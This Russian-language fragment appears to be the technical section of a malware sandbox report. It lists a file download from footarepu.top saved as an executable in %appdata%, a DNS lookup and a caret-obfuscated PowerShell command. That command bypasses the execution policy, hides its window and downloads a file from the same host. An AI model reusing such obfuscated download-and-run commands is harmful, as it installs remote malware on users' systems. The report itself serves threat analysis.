Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^O^We^RsHE^ll.ex^E^ ^-^eXE^Cutio^NP^O^LIcY^ BYp^Ass^ -^Nopr^o^F^IlE^ -^WIND^oWS^TyLE HiDdE^n^ (N^ew^-^objECt^ System.N^E^T.^wEBcLieNT).DO^wN^LOAD^f^I^LE^('http://footarep...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "p^O^We^RsHE^ll.ex^E^ ^-^eXE^Cutio^NP^O^LIcY^ BYp^Ass^ -^Nopr^o^F^IlE^ -^WIND^oWS^TyLE HiDdE^n^ (N^ew^-^objECt^ System.N^E^T.^wEBcLieNT).DO^wN^LOAD^f^I^LE^('http://footarep...' (со скрытым окном)